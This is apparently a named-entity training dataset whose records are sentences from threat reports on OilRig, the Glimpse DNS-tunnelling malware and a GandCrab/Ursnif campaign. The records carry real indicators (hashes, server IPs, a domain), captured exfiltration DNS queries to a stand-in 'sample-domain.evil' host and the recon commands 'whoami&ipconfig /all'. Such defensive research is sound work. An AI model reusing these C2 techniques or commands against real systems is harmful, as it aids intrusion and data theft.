{"text": "From April 19-24 , 2017 , a politically-motivated , targeted campaign was carried out against numerous Israeli organizations .", "spans": {}, "info": {"id": "aptner_train_000000", "source": "aptner_train"}} {"text": "Initial reports of the attacks , published April 26 ( in Hebrew ) by the Israel National Cyber Event Readiness Team ( CERT-IL ) and The Marker , confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel .", "spans": {"Organization: Israel National Cyber Event Readiness Team": [[73, 115]], "Organization: CERT-IL": [[118, 125]], "Organization: Marker": [[136, 142]], "System: email": [[203, 208]], "Organization: Ben-Gurion University": [[221, 242]]}, "info": {"id": "aptner_train_000002", "source": "aptner_train"}} {"text": "Ironically , Ben-Gurion University is home to Israel ’s Cyber Security Research Center .", "spans": {"Organization: Ben-Gurion University": [[13, 34]], "Organization: Israel ’s Cyber Security Research Center": [[46, 86]]}, "info": {"id": "aptner_train_000003", "source": "aptner_train"}} {"text": "Investigators put the origin of the attack as Iranian ; Morphisec ’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns .", "spans": {"Organization: Morphisec": [[56, 65]], "Malware: OilRig": [[184, 190]]}, "info": {"id": "aptner_train_000004", "source": "aptner_train"}} {"text": "The fileless attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word , CVE-2017-0199 , to install a fileless attack variant of the Helminth Trojan agent .", "spans": {"Organization: fileless attack": [[4, 19]], "System: Microsoft Word": [[38, 52]], "Vulnerability: zero-day": [[87, 95]], "System: Word": [[113, 117]], "Vulnerability: CVE-2017-0199": [[120, 133]], "Malware: Helminth": [[180, 188]], "Malware: Trojan": [[189, 195]]}, "info": 
{"id": "aptner_train_000005", "source": "aptner_train"}} {"text": "Microsoft released the patch for the vulnerability on April 11 , but many organizations have not yet deployed the update .", "spans": {"Organization: Microsoft": [[0, 9]]}, "info": {"id": "aptner_train_000006", "source": "aptner_train"}} {"text": "The attackers actually based their attack on an existing Proof-of-Concept method that was published by researchers after the patch release .", "spans": {}, "info": {"id": "aptner_train_000007", "source": "aptner_train"}} {"text": "By hunting through known malware repositories , Morphisec identified matching samples uploaded by Israeli high-tech development companies , medical organizations and education organizations , indicating that they were victims of the attack .", "spans": {"Organization: Morphisec": [[48, 57]], "Organization: medical organizations": [[140, 161]], "Organization: education organizations": [[166, 189]]}, "info": {"id": "aptner_train_000008", "source": "aptner_train"}} {"text": "For security purposes , Morphisec is not revealing these names .", "spans": {"Organization: Morphisec": [[24, 33]]}, "info": {"id": "aptner_train_000009", "source": "aptner_train"}} {"text": "Upon deeper investigation into the installed Helminth fileless agent , we identified a near perfect match to the OilRig campaign executed by an Iranian hacker group against 140 financial institutions in the Middle East last year , as analyzed by FireEye , Palo Alto Networks and Logrhythm .", "spans": {"Malware: Helminth": [[45, 53]], "Malware: OilRig": [[113, 119]], "Organization: FireEye": [[246, 253]], "Organization: Palo Alto Networks": [[256, 274]], "Organization: Logrhythm": [[279, 288]]}, "info": {"id": "aptner_train_000010", "source": "aptner_train"}} {"text": "This group has become one of the most active threat actors , with noteworthy abilities , resources and infrastructure ; speculations indicate the hacking organization to be sponsored by the Iranian government 
.", "spans": {"Organization: Iranian government": [[190, 208]]}, "info": {"id": "aptner_train_000011", "source": "aptner_train"}} {"text": "In other recent attacks ( January 2017 ) , the group used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware as described by ClearSky .", "spans": {"System: Juniper Networks VPN": [[65, 85]], "Organization: University of Oxford": [[102, 122]], "Organization: ClearSky": [[167, 175]]}, "info": {"id": "aptner_train_000012", "source": "aptner_train"}} {"text": "Name SHA256 .", "spans": {}, "info": {"id": "aptner_train_000013", "source": "aptner_train"}} {"text": "13.doc : a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab .", "spans": {"Indicator: 13.doc": [[0, 6]], "Indicator: a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab": [[9, 73]]}, "info": {"id": "aptner_train_000014", "source": "aptner_train"}} {"text": "558.doc , 2.doc: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 .", "spans": {"Indicator: 558.doc": [[0, 7]], "Indicator: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84": [[17, 81]]}, "info": {"id": "aptner_train_000015", "source": "aptner_train"}} {"text": "1.doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 .", "spans": {"Indicator: 1.doc": [[0, 5]], "Indicator: 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8": [[8, 72]]}, "info": {"id": "aptner_train_000016", "source": "aptner_train"}} {"text": "3.doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 .", "spans": {"Indicator: 3.doc": [[0, 5]], "Indicator: d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48": [[8, 72]]}, "info": {"id": "aptner_train_000017", "source": "aptner_train"}} {"text": "The most notable difference from last year ’s OilRig campaign is the way the attack was delivered .", "spans": {"Malware: OilRig": [[46, 52]]}, "info": {"id": "aptner_train_000018", "source": 
"aptner_train"}} {"text": "In the previous campaign , the Iranian group sent specially crafted Excel and Word files , which contained macros that targeted individuals were convinced to enable .", "spans": {"System: Excel": [[68, 73]], "System: Word": [[78, 82]]}, "info": {"id": "aptner_train_000019", "source": "aptner_train"}} {"text": "Name Delivery Server .", "spans": {}, "info": {"id": "aptner_train_000020", "source": "aptner_train"}} {"text": "test4.hta http://comonscar.in ( 82.145.40.46 ) .", "spans": {"Indicator: test4.hta": [[0, 9]], "Indicator: http://comonscar.in": [[10, 29]], "Indicator: 82.145.40.46": [[32, 44]]}, "info": {"id": "aptner_train_000021", "source": "aptner_train"}} {"text": "test5.hta 80.82.67.42 .", "spans": {"Indicator: test5.hta": [[0, 9]], "Indicator: 80.82.67.42": [[10, 21]]}, "info": {"id": "aptner_train_000022", "source": "aptner_train"}} {"text": "test1.hta reserved .", "spans": {"Indicator: test1.hta": [[0, 9]]}, "info": {"id": "aptner_train_000023", "source": "aptner_train"}} {"text": "SHA256: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 .", "spans": {"Indicator: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43": [[8, 72]]}, "info": {"id": "aptner_train_000024", "source": "aptner_train"}} {"text": "Name SHA256 .", "spans": {}, "info": {"id": "aptner_train_000025", "source": "aptner_train"}} {"text": "0011.ps1 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 .", "spans": {"Indicator: 0011.ps1": [[0, 8]], "Indicator: 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1": [[9, 73]]}, "info": {"id": "aptner_train_000026", "source": "aptner_train"}} {"text": "1.vbs BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED .", "spans": {"Indicator: 1.vbs": [[0, 5]], "Indicator: BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED": [[6, 70]]}, "info": {"id": "aptner_train_000027", "source": "aptner_train"}} {"text": "A Glimpse into Glimpse For the second 
blog post in our series, the IronNet Threat Research Team examines the Glimpse malware that is written in PowerShell and has been associated with OilRig .", "spans": {"Organization: Glimpse": [[15, 22]], "Organization: IronNet Threat Research Team": [[67, 95]], "Malware: Glimpse": [[109, 116]], "System: PowerShell": [[144, 154]], "Organization: OilRig": [[184, 190]]}, "info": {"id": "aptner_train_000028", "source": "aptner_train"}} {"text": "Our first post about analyzing malware with DNS tunneling capabilities focuses on how the PoisonFrog malware uses DNS tunneling to send and receive victim information and commands .", "spans": {"Malware: PoisonFrog": [[90, 100]]}, "info": {"id": "aptner_train_000029", "source": "aptner_train"}} {"text": "Glimpse : 6e86c57385d26a59c0df1580454b9967 .", "spans": {"Malware: Glimpse": [[0, 7]], "Indicator: 6e86c57385d26a59c0df1580454b9967": [[10, 42]]}, "info": {"id": "aptner_train_000030", "source": "aptner_train"}} {"text": "Glimpse is a PowerShell script that is executed silently by Visual Basic script .", "spans": {"Malware: Glimpse": [[0, 7]], "System: PowerShell": [[13, 23]], "System: Visual Basic": [[60, 72]]}, "info": {"id": "aptner_train_000031", "source": "aptner_train"}} {"text": "Based on the code, it is unclear what initiates the Visual Basic script itself .", "spans": {"System: Visual Basic": [[52, 64]]}, "info": {"id": "aptner_train_000032", "source": "aptner_train"}} {"text": "However, a variety of typical persistence mechanisms, such as a scheduled task, could serve that purpose .", "spans": {}, "info": {"id": "aptner_train_000033", "source": "aptner_train"}} {"text": "After Glimpse starts, it checks for the existence of a directory and lock file .", "spans": {"Malware: Glimpse": [[6, 13]]}, "info": {"id": "aptner_train_000034", "source": "aptner_train"}} {"text": "If no directory or lock file is found, Glimpse creates one .", "spans": {"Malware: Glimpse": [[39, 46]]}, "info": {"id": "aptner_train_000035", "source": 
"aptner_train"}} {"text": "Alternatively, if these do exist and the lock file is older than 10 minutes, the lock file is deleted and the previously running Glimpse script is killed .", "spans": {"Malware: Glimpse": [[129, 136]]}, "info": {"id": "aptner_train_000036", "source": "aptner_train"}} {"text": "After the initial checks described above, Glimpse creates a hidden file that contains an agent ID, which is a simple concatenation of a random number 10-99 and the first 8 characters of a GUID without dashes .", "spans": {"Malware: Glimpse": [[42, 49]], "System: GUID": [[188, 192]]}, "info": {"id": "aptner_train_000037", "source": "aptner_train"}} {"text": "The methods employed by Glimpse to perform DNS communications are determined by the mode in which it is operating (i.e., text mode or ping mode ) .", "spans": {"Malware: Glimpse": [[24, 31]]}, "info": {"id": "aptner_train_000038", "source": "aptner_train"}} {"text": "In text mode, Glimpse manually builds a DNS query to be transmitted over a UDP socket .", "spans": {"Malware: Glimpse": [[14, 21]], "System: UDP socket": [[75, 85]]}, "info": {"id": "aptner_train_000039", "source": "aptner_train"}} {"text": "In ping mode, Glimpse uses a .NET method .", "spans": {"Malware: Glimpse": [[14, 21]], "Indicator: a .NET": [[27, 33]]}, "info": {"id": "aptner_train_000040", "source": "aptner_train"}} {"text": "The table below describes the operational mode, record types used, and the method used to send the query .", "spans": {}, "info": {"id": "aptner_train_000041", "source": "aptner_train"}} {"text": "The first DNS query by Glimpse requests the mode to be used in future communications with the controller (i.e., ping mode or text mode ) .", "spans": {"Malware: Glimpse": [[23, 30]]}, "info": {"id": "aptner_train_000042", "source": "aptner_train"}} {"text": "Prior to making any query, a function called AdrGen is used to build a query string .", "spans": {}, "info": {"id": "aptner_train_000043", "source": "aptner_train"}} 
{"text": "This function takes several parameters, most of which are represented in the subdomain label(s) of the query string .", "spans": {}, "info": {"id": "aptner_train_000044", "source": "aptner_train"}} {"text": "Below is a list of AdrGen parameters .", "spans": {}, "info": {"id": "aptner_train_000045", "source": "aptner_train"}} {"text": "As mentioned above, one of the parameters passed to the AdrGen function is the action parameter .", "spans": {}, "info": {"id": "aptner_train_000046", "source": "aptner_train"}} {"text": "Table 5: Glimpse action parameters values for the AdrGen function below contains the possible parameters, a brief description, and return values applicable to the action parameter .", "spans": {"Malware: Glimpse": [[9, 16]]}, "info": {"id": "aptner_train_000047", "source": "aptner_train"}} {"text": "The query to set the receive mode expects an A resource record response from the controller .", "spans": {}, "info": {"id": "aptner_train_000048", "source": "aptner_train"}} {"text": "The controller will respond with one of two responses: 99.250.250.199 will set the receive mode to text .", "spans": {"Indicator: 99.250.250.199": [[55, 69]]}, "info": {"id": "aptner_train_000049", "source": "aptner_train"}} {"text": "Any other IP address will set the receive mode to ping, although the server-side software suggests 199.250.250.99 will be sent .", "spans": {"Indicator: 199.250.250.99": [[99, 113]]}, "info": {"id": "aptner_train_000050", "source": "aptner_train"}} {"text": "When set in text receive mode, the malware uses the AdrGen function to create another query string with the r (receiver) flag and a W (wait) action parameter .", "spans": {}, "info": {"id": "aptner_train_000051", "source": "aptner_train"}} {"text": "The expected TXT record response has the following structure: command>data .", "spans": {}, "info": {"id": "aptner_train_000052", "source": "aptner_train"}} {"text": "In our sample traffic, the TXT resource record returned contained: 
S000s>10100 .", "spans": {}, "info": {"id": "aptner_train_000053", "source": "aptner_train"}} {"text": "This response tells the malware to set a variable for the file name to receivebox\\rcvd10100 and set the next query action to D in order to request the next chunk of data .", "spans": {"Indicator: receivebox\\rcvd10100": [[71, 91]]}, "info": {"id": "aptner_train_000054", "source": "aptner_train"}} {"text": "The malware sends another TXT query with the receiver structure .", "spans": {}, "info": {"id": "aptner_train_000055", "source": "aptner_train"}} {"text": "This query is depicted below: 39e9D60005eca60000BCC64T.sample-domain.evil In the case of our sample traffic, the server responded with the following TXT resource record data: S0000>d2hvYW1pJmlwY29uZmlnIC9hbGw= .", "spans": {"Indicator: 39e9D60005eca60000BCC64T.sample-domain.evil": [[30, 73]]}, "info": {"id": "aptner_train_000056", "source": "aptner_train"}} {"text": "The controller provided the malware with base64-encoded data to be decoded .", "spans": {}, "info": {"id": "aptner_train_000057", "source": "aptner_train"}} {"text": "The data will eventually be written to disk and the malware sets the next query action to D in order to request the next chunk of data .", "spans": {}, "info": {"id": "aptner_train_000058", "source": "aptner_train"}} {"text": "The decoded data shows a command to be executed whoami&ipconfig /all on the victim system .", "spans": {}, "info": {"id": "aptner_train_000059", "source": "aptner_train"}} {"text": "The malware sends another TXT query with the receiver structure, as depicted below .", "spans": {}, "info": {"id": "aptner_train_000060", "source": "aptner_train"}} {"text": "Note the request number parameter is now 0001: 39e965e000caD60001679C79T.sample-domain.evil .", "spans": {"Indicator: 39e965e000caD60001679C79T.sample-domain.evil": [[47, 91]]}, "info": {"id": "aptner_train_000061", "source": "aptner_train"}} {"text": "The TXT record returned contained data: E0000>0 .", 
"spans": {}, "info": {"id": "aptner_train_000062", "source": "aptner_train"}} {"text": "The controller issued the command to write the base64-decoded and modified data to the file name set earlier in the exchange .", "spans": {}, "info": {"id": "aptner_train_000063", "source": "aptner_train"}} {"text": "After the file is written, the malware moves on to process operations .", "spans": {}, "info": {"id": "aptner_train_000064", "source": "aptner_train"}} {"text": "Glimpse can be set to use ping mode in several ways while performing receive operations .", "spans": {"Malware: Glimpse": [[0, 7]]}, "info": {"id": "aptner_train_000065", "source": "aptner_train"}} {"text": "If a query with the M action returns an IP address that is not 99.250.250.199 , the malware will use ping mode .", "spans": {"Indicator: 99.250.250.199": [[63, 77]]}, "info": {"id": "aptner_train_000066", "source": "aptner_train"}} {"text": "It is worth noting that the IP response observed to set ping mode was the reverse of the IP used to set text mode (i.e., 199.250.250.99 ) .", "spans": {"Indicator: 199.250.250.99": [[121, 135]]}, "info": {"id": "aptner_train_000067", "source": "aptner_train"}} {"text": "Ping mode will also be set if exceptions occur more than three times during text mode .", "spans": {}, "info": {"id": "aptner_train_000068", "source": "aptner_train"}} {"text": "In the latter case, the P action is passed as one of the parameters to AdrGen and the query is made for an A resource record using the [System.Net.Dns]::GetHostAddresses method .", "spans": {}, "info": {"id": "aptner_train_000069", "source": "aptner_train"}} {"text": "If performing receive operations in ping mode, Glimpse makes a query with the 0 action to contact the controller for tasking .", "spans": {"Malware: Glimpse": [[47, 54]]}, "info": {"id": "aptner_train_000070", "source": "aptner_train"}} {"text": "This query uses a receive structure similar to an M action; it is worth noting all of the receiver operation queries 
made in ping mode use the [System.Net.Dns]::GetHostAddresses method .", "spans": {}, "info": {"id": "aptner_train_000071", "source": "aptner_train"}} {"text": "In our sample, after the malware sent the 0 action, the controller responded with an A record containing 24.125.10.140 .", "spans": {"Indicator: 24.125.10.140": [[105, 118]]}, "info": {"id": "aptner_train_000072", "source": "aptner_train"}} {"text": "This response tells the malware to: Set the file name for the data that will follow to 10140, Set the part number to 0, Parse response data, Set a 1 action for the next query .", "spans": {}, "info": {"id": "aptner_train_000073", "source": "aptner_train"}} {"text": "Query: 00039e9650eca66C06T.sample-domain.evil , Response: 24.125.10.140 , File name: 10140, Query: 139e965e000ca6D2C80T.sample-domain.evil , Response: 110.101.116.0 , Query: 00339e965e1ca6EF4C07T.sample-domain.evil , Response: 32.117.115.3 , Query: 30069e 1965eca6FE8C13T.sample-domain.evil, Response: 101.114.32.6 , Query: 391 e960095eca63570BC62T.sample-domain.evil , Response: 1.2.3.0 .", "spans": {"Indicator: 00039e9650eca66C06T.sample-domain.evil": [[7, 45]], "Indicator: 24.125.10.140": [[58, 71]], "Indicator: 139e965e000ca6D2C80T.sample-domain.evil": [[99, 138]], "Indicator: 110.101.116.0": [[151, 164]], "Indicator: 00339e965e1ca6EF4C07T.sample-domain.evil": [[174, 214]], "Indicator: 32.117.115.3": [[227, 239]], "Indicator: 101.114.32.6": [[302, 314]], "Indicator: 391 e960095eca63570BC62T.sample-domain.evil": [[324, 367]], "Indicator: 1.2.3.0": [[380, 387]]}, "info": {"id": "aptner_train_000074", "source": "aptner_train"}} {"text": "In this case, the content net user is written to rcvd10140 .", "spans": {}, "info": {"id": "aptner_train_000075", "source": "aptner_train"}} {"text": "After writing the data to disk, receiver operations are complete and processor operations begin .", "spans": {}, "info": {"id": "aptner_train_000076", "source": "aptner_train"}} {"text": "After writing the data received 
from the controller, a function is called to process the received file .", "spans": {}, "info": {"id": "aptner_train_000077", "source": "aptner_train"}} {"text": "The processor function builds a list of files from the files with content that match rcvd* in the receivebox directory .", "spans": {}, "info": {"id": "aptner_train_000078", "source": "aptner_train"}} {"text": "Similar to PoisonFrog , the last digit of the received file name determines how the content of the file is processed .", "spans": {"Malware: PoisonFrog": [[11, 21]]}, "info": {"id": "aptner_train_000079", "source": "aptner_train"}} {"text": "In our sample traffic, after executing the commands sent via cmd.exe , Glimpse writes the output of the commands in the sendbox directory to the appropriate file names (e.g., 10100 or 10140) prepended with proc (e.g., proc10100 ) .", "spans": {"Indicator: cmd.exe": [[61, 68]], "Malware: Glimpse": [[71, 78]]}, "info": {"id": "aptner_train_000080", "source": "aptner_train"}} {"text": "Once written, the send operations begin .", "spans": {}, "info": {"id": "aptner_train_000081", "source": "aptner_train"}} {"text": "Similar to text mode receiver, after AdrGen builds the string, a function to manually build and send the DNS query packet is called .", "spans": {"Malware: AdrGen": [[37, 43]]}, "info": {"id": "aptner_train_000082", "source": "aptner_train"}} {"text": "The text mode sender uses the same hardcoded transaction ID 0xa4a3; however, instead of sending queries for TXT resource records, the malware uses A resource records .", "spans": {}, "info": {"id": "aptner_train_000083", "source": "aptner_train"}} {"text": "As with the text mode receiver, the query is made with a direct connection to the controller IP address as opposed to allowing the query to propagate the native DNS architecture .", "spans": {}, "info": {"id": "aptner_train_000084", "source": "aptner_train"}} {"text": "If the send function is being invoked in ping mode, the process described above is 
followed; however, instead of manually building and transmitting the DNS query, the [System.Net.Dns]::GetHostAddresses method is used .", "spans": {}, "info": {"id": "aptner_train_000085", "source": "aptner_train"}} {"text": "With that method, the malware’s query will traverse the native DNS architecture as opposed to the victim making a direct connection to the controller .", "spans": {}, "info": {"id": "aptner_train_000086", "source": "aptner_train"}} {"text": "The send function uses several counters to maintain various pieces of information used to control the flow of execution .", "spans": {}, "info": {"id": "aptner_train_000087", "source": "aptner_train"}} {"text": "An exception counter is used to track the number of exceptions and will exit the send loop if a threshold is hit .", "spans": {}, "info": {"id": "aptner_train_000088", "source": "aptner_train"}} {"text": "The send counter is used to track the number of chunks sent to the controller .", "spans": {}, "info": {"id": "aptner_train_000089", "source": "aptner_train"}} {"text": "An additional counter exists to handle cases where the file being sent is larger than 250 chunks .", "spans": {}, "info": {"id": "aptner_train_000090", "source": "aptner_train"}} {"text": "The send counter is initialized to 0 and read from the fourth octet of the A record returned by the controller .", "spans": {}, "info": {"id": "aptner_train_000091", "source": "aptner_train"}} {"text": "The send counter is also passed to the AdrGen function as the part number parameter and is visible in the query string as depicted below: Query: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil , Response: 39.2.3.1 , Query: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil , Response: 39.2.3.2 , Query: 
392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil .", "spans": {"Malware: AdrGen": [[39, 45]], "Indicator: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil": [[145, 262]], "Indicator: 39.2.3.1": [[275, 283]], "Indicator: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil": [[293, 412]], "Indicator: 39.2.3.2": [[425, 433]], "Indicator: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil": [[443, 563]]}, "info": {"id": "aptner_train_000092", "source": "aptner_train"}} {"text": "When the send loop has fewer than 60 bytes to send (e.g., a small file or the last part of a file), the send function transmits the remaining bytes with a shorter data section .", "spans": {}, "info": {"id": "aptner_train_000093", "source": "aptner_train"}} {"text": "When there are no more bytes to send, a hardcoded file end marker COCTabCOCT is sent in the data section and the send loop will be exited .", "spans": {}, "info": {"id": "aptner_train_000094", "source": "aptner_train"}} {"text": "The controller responds with the 253.25.42.87 A record response .", "spans": {"Indicator: 253.25.42.87": [[33, 45]]}, "info": {"id": "aptner_train_000095", "source": "aptner_train"}} {"text": "Query: 239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil , Response: 39.2.3.56 , Query: 05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil , Response: 253.25.42.87 .", "spans": {"Indicator: 239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil": [[7, 103]], "Indicator: 39.2.3.56": [[116, 125]], "Indicator: 05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil": [[135, 201]], "Indicator: 253.25.42.87": [[214, 226]]}, "info": 
{"id": "aptner_train_000096", "source": "aptner_train"}} {"text": "Once an A record response is received by the malware containing 253.25.42.87 , several variables are set in preparation to exit the send operation .", "spans": {"Indicator: 253.25.42.87": [[64, 76]]}, "info": {"id": "aptner_train_000097", "source": "aptner_train"}} {"text": "After the send operation is complete, the lock file for the current run is deleted and the script exits .", "spans": {}, "info": {"id": "aptner_train_000098", "source": "aptner_train"}} {"text": "Many of the capabilities discovered in Glimpse were also present in the malware analyzed in part one of this series .", "spans": {"Malware: Glimpse": [[39, 46]]}, "info": {"id": "aptner_train_000099", "source": "aptner_train"}} {"text": "Glimpse added the ability to use an alternate DNS resource record type (TXT) as opposed to solely relying on A resource records for DNS queries .", "spans": {"Malware: Glimpse": [[0, 7]]}, "info": {"id": "aptner_train_000100", "source": "aptner_train"}} {"text": "Using TXT resource records enabled the actors to provide tasking in fewer transactions due to the amount of data that can be transmitted in a TXT response .", "spans": {}, "info": {"id": "aptner_train_000101", "source": "aptner_train"}} {"text": "To support this capability, the adversaries chose to manually craft the DNS queries and communicate directly with the controller as opposed to using existing .NET DNS libraries .", "spans": {"Indicator: .NET": [[158, 162]]}, "info": {"id": "aptner_train_000102", "source": "aptner_train"}} {"text": "The differences between PoisonFrog and Glimpse highlight the ease at which adversaries can modify their tools to meet their end objectives .", "spans": {"Malware: PoisonFrog": [[24, 34]], "Malware: Glimpse": [[39, 46]]}, "info": {"id": "aptner_train_000103", "source": "aptner_train"}} {"text": "With regard to detection, several methods can be used to identify this type of C2 activity .", "spans": {"System: 
C2": [[79, 81]]}, "info": {"id": "aptner_train_000104", "source": "aptner_train"}} {"text": "Performing entropy calculations on subdomain labels can help highlight the amount of randomness in a label, but this is just one of many possible data analysis points, since a standalone feature may not be enough to determine whether traffic is malicious .", "spans": {}, "info": {"id": "aptner_train_000105", "source": "aptner_train"}} {"text": "The IronDefense Network Traffic Analysis platform combines several behavioral detection methods alongside historical network information to detect the C2 techniques used by Glimpse and other malware .", "spans": {"System: C2": [[151, 153]], "Malware: Glimpse": [[173, 180]]}, "info": {"id": "aptner_train_000106", "source": "aptner_train"}} {"text": "Carbon Black TAU ThreatSight Analysis GandCrab and Ursnif Campaign .", "spans": {"Organization: Carbon Black TAU ThreatSight": [[0, 28]], "Malware: GandCrab": [[38, 46]], "Malware: Ursnif": [[51, 57]]}, "info": {"id": "aptner_train_000107", "source": "aptner_train"}} {"text": "The Carbon Black ThreatSight team observed an interesting campaign over the last month .", "spans": {"Organization: Carbon Black ThreatSight": [[4, 28]]}, "info": {"id": "aptner_train_000108", "source": "aptner_train"}} {"text": "ThreatSight worked with the Threat Analysis Unit ( TAU ) to research the campaign .", "spans": {"Organization: ThreatSight": [[0, 11]], "Organization: Threat Analysis Unit": [[28, 48]], "Organization: TAU": [[51, 54]]}, "info": {"id": "aptner_train_000109", "source": "aptner_train"}} {"text": "This report is being released to help researchers and security practitioners combat this campaign as new samples are being discovered in the wild daily .", "spans": {}, "info": {"id": "aptner_train_000110", "source": "aptner_train"}} {"text": "This attack , if successful , can infect a compromised system with both Ursnif malware and GandCrab ransomware .", "spans": {"Malware: Ursnif": [[72, 78]], 
"Malware: GandCrab": [[91, 99]]}, "info": {"id": "aptner_train_000111", "source": "aptner_train"}} {"text": "The overall attack leverages several different approaches , which are popular techniques amongst red teamers , espionage focused adversaries , and large scale criminal campaigns .", "spans": {}, "info": {"id": "aptner_train_000112", "source": "aptner_train"}} {"text": "This campaign originally came in via phishing emails that contained an attached Word document with embedded macros , Carbon Black located roughly 180 variants in the wild .", "spans": {"System: Word document": [[80, 93]], "Organization: Carbon Black": [[117, 129]]}, "info": {"id": "aptner_train_000113", "source": "aptner_train"}} {"text": "The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both a Ursnif and GandCrab variant .", "spans": {"System: PowerShell": [[32, 42]], "Malware: Ursnif": [[117, 123]], "Malware: GandCrab": [[128, 136]]}, "info": {"id": "aptner_train_000114", "source": "aptner_train"}} {"text": "This campaign has been discussed at a high level by other researchers publicly .", "spans": {}, "info": {"id": "aptner_train_000115", "source": "aptner_train"}} {"text": "Carbon Black product specific content can be located in the User Exchange .", "spans": {"Organization: Carbon Black": [[0, 12]], "System: User Exchange": [[60, 73]]}, "info": {"id": "aptner_train_000116", "source": "aptner_train"}} {"text": "In this campaign the attackers used a MS Word document ( .doc format ) to deliver the initial stages .", "spans": {"System: MS Word": [[38, 45]], "Indicator: .doc": [[57, 61]]}, "info": {"id": "aptner_train_000117", "source": "aptner_train"}} {"text": "It should be noted that out of the roughly 180 Word variants that were located by Carbon Black , the biggest difference in the documents was the metadata and junk data located in the malicious macros .", "spans": {"System: Word": [[47, 51]], "Organization: Carbon Black": 
[[82, 94]]}, "info": {"id": "aptner_train_000118", "source": "aptner_train"}} {"text": "However the metadata clearly showed that the documents prepared for this campaign were initially saved on December 17 , 2018 and have continued to be updated through January 21 , 2019 .", "spans": {}, "info": {"id": "aptner_train_000119", "source": "aptner_train"}} {"text": "Several metadata fields ( specifically title , subject , author , comments , manager , and company ) appear to have been populated with different data sets .", "spans": {}, "info": {"id": "aptner_train_000120", "source": "aptner_train"}} {"text": "For example the subject in all the samples was a combination of a US state and a common first name ( like Utah Erick or Tennessee Dayna ) .", "spans": {}, "info": {"id": "aptner_train_000121", "source": "aptner_train"}} {"text": "For this post the following sample was analyzed .", "spans": {}, "info": {"id": "aptner_train_000122", "source": "aptner_train"}} {"text": "Richard_Johnson.doc : 878e4e8677e68aba918d930f2cc67fbe 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 .", "spans": {"Indicator: Richard_Johnson.doc": [[0, 19]], "Indicator: 878e4e8677e68aba918d930f2cc67fbe": [[22, 54]], "Indicator: 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080": [[55, 119]]}, "info": {"id": "aptner_train_000123", "source": "aptner_train"}} {"text": "The document contained a VBS macro that once decompressed was approximately 650 lines of code .", "spans": {"System: VBS macro": [[25, 34]]}, "info": {"id": "aptner_train_000124", "source": "aptner_train"}} {"text": "The vast majority of that was junk code .", "spans": {}, "info": {"id": "aptner_train_000125", "source": "aptner_train"}} {"text": "Once the junk code was removed from the VBScript , there are approximately 18 lines of relevant code , which ultimately call a shape box in the current document .", "spans": {"System: VBScript": [[40, 48]]}, "info": {"id": "aptner_train_000126", "source": 
"aptner_train"}} {"text": "The variable names themselves are not relevant , however the methods in bold below will retrieve the AlternativeText field from the specified shape , which is then executed .", "spans": {"System: AlternativeText": [[101, 116]]}, "info": {"id": "aptner_train_000127", "source": "aptner_train"}} {"text": "The alternate text can easily be observed in the body of the office document .", "spans": {}, "info": {"id": "aptner_train_000128", "source": "aptner_train"}} {"text": "The area highlighted in blue is the shape name that is being located , while the text itself is highlighted in red .", "spans": {}, "info": {"id": "aptner_train_000129", "source": "aptner_train"}} {"text": "It is clear that the text is a base64 encoded command , that is then executed by the above VBScript .", "spans": {"System: VBScript": [[91, 99]]}, "info": {"id": "aptner_train_000130", "source": "aptner_train"}} {"text": "The PowerShell script will first create an instance of the .Net WebClient class and then enumerate the available methods using the GetMethods() call ( highlighted in the image in red ) .", "spans": {"System: PowerShell": [[4, 14]], "Indicator: .Net": [[59, 63]], "System: GetMethods()": [[131, 143]]}, "info": {"id": "aptner_train_000131", "source": "aptner_train"}} {"text": "The enumerated methods are stored , then a for loop looks first for the method named DownloadString ( highlighted in blue ) .", "spans": {"System: DownloadString": [[85, 99]]}, "info": {"id": "aptner_train_000132", "source": "aptner_train"}} {"text": "If the DownloadString method is located it will contact the hard coded C2 requesting a file , which is downloaded and then invoked ( highlighted in blue ) .", "spans": {"System: DownloadString": [[7, 21]], "System: C2": [[71, 73]]}, "info": {"id": "aptner_train_000133", "source": "aptner_train"}} {"text": 